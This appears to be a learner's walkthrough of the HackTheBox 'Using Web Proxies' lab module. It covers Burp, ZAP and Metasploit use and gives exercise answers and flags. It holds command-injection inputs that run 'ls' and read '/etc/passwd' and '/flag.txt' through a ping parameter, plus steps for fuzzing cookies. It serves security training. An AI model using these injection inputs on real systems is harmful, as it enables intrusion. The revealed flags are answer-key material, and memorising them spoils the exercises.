Using Web Proxies HackTheBox
Intercepting Web Requests
So, let us change the ip parameter’s value from 1 to ;ls;
Try intercepting the ping request on the server shown above, and change the post data similarly to what we did in this section. Change the command to read ‘flag.txt’
Try using request repeating to be able to quickly test commands. With that, try looking for the other flag.
The string found in the attached file has been encoded several times with various encoders. Try to use the decoding tools we discussed to decode it and get the flag.
string:
VTJ4U1VrNUZjRlZXVkVKTFZrWkdOVk5zVW10aFZYQlZWRmh3UzFaR2NITlRiRkphWld0d1ZWUllaRXRXUm10M1UyeFNUbVZGY0ZWWGJYaExWa1V3ZVZOc1VsZGlWWEJWVjIxNFMxWkZNVFJUYkZKaFlrVndWVmR0YUV0V1JUQjNVMnhTYTJGM1BUMD0=
BurpSuite -> decoder
4x base64 -> ASCII hex -> Binary-> remove ‘%’
HTB{3nc0d1n6_n1nj4}
Proxying Tools
Try running ‘auxiliary/scanner/http/http_put’ in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?
msfconsole
msf6 >search http_put
msf6 >use 0
msf6 >set RHOSTS 206.189.117.48
msf6 >set RPORT 30301
msf6 >set PROXIES HTTP:127.0.0.1:8080
msf6 >run
Burp Intruder
Use Burp Intruder to fuzz for ‘.html’ files under the /admin directory, to find a file containing the flag.
ZAP Fuzzer
The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit ‘/skills/’ to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the “top-usernames-shortlist.txt” wordlist from Seclists.
Intercept website request on zap
fuzzer request:
Right mouse click on cookie request -> Fuzz
Set wordlist:top-usernames-shortlist.txt
Set Processors: Hash MD5
Start Fuzz.
cookie=ee11cbb19052e40b07aac0ca060c23ee = user
Try to use hash as cookie
ZAP Scanner
Run ZAP Scanner on the target above to identify directories and potential vulnerabilities. Once you find the high-level vulnerability, try to use it to read the flag at ‘/flag.txt’
Remote OS Command Injection
http://139.59.191.154:32538/devtools/ping.php?ip=127.0.0.1%26cat+%2Fetc%2Fpasswd%26
http://139.59.191.154:32538/devtools/ping.php?ip=127.0.0.1%26cat+%2Fflag.txt%26
Skills Assessment — Using Web Proxies
The /lucky.php page has a button that appears to be disabled. Try to enable the button, and then click it to get the flag.
Nota: intercerta o request da pagina /lucky.php, na response apaga o disable e em seguida clica no button e intercetamos o request do button e enviamos para o repeater onde enviaremos este request varias vezes ate receber a flag
The /admin.php page uses a cookie that has been encoded multiple times. Try to decode the cookie until you get a value with 31-characters. Submit the value as the answer.
CyberChef ->from hex -> from base64
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the “alphanum-case.txt” wordlist from Seclist for the payload)
Burp:
run the payload and get da flag:
You are using the ‘auxiliary/scanner/http/coldfusion_locale_traversal’ tool within Metasploit, but it is not working properly for you. You decide to capture the request sent by Metasploit so you can manually verify it and repeat it. Once you capture the request, what is the ‘XXXXX’ directory being called in ‘/XXXXX/administrator/..’?
msf6 >search coldfusion_locale_traversal
msf6 >use 0
msf6 >set RHOSTS 167.71.140.137
msf6 >set RPORT 30650
msf6 >set PROXIES HTTP:127.0.0.1:8080
msf6 >exploit